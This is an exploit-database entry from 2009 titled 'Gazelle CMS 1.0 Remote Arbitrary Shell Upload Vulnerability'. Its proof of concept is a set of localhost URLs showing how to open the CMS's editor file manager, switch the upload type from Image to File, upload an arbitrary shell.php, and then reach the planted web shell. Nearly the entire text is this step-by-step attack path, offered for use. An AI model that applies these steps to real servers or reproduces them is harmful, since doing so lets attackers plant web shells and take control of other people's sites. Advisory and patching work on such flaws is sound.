id: 5652
date: 08/12/2009
title: Gazelle CMS 1.0 Remote Arbitrary Shell Upload Vulnerability
author: RoMaNcYxHaCkEr
cves: 

===========================================================
Gazelle CMS 1.0 Remote Arbitrary Shell Upload Vulnerability
===========================================================


[!] Discovered.:                        RoMaNcYxHaCkEr

[!] Vendor.....:                        http://www.anantasoft.com/index.php?Gazelle%20CMS/Download
 
[!] PoC........:
 
http://localhost/Ananta_Gazelle1.0/admin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Image
^^^^
This Is Default In Editor admin
Try Change Image To File Like This :
http://localhost/Ananta_Gazelle1.0/admin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type=File
Upload Any Shell.php Then You See That,s Here E.G. :
http://localhost/Ananta_Gazelle1.0/user/File/shell.php



#  0day.today [2023-03-24]  #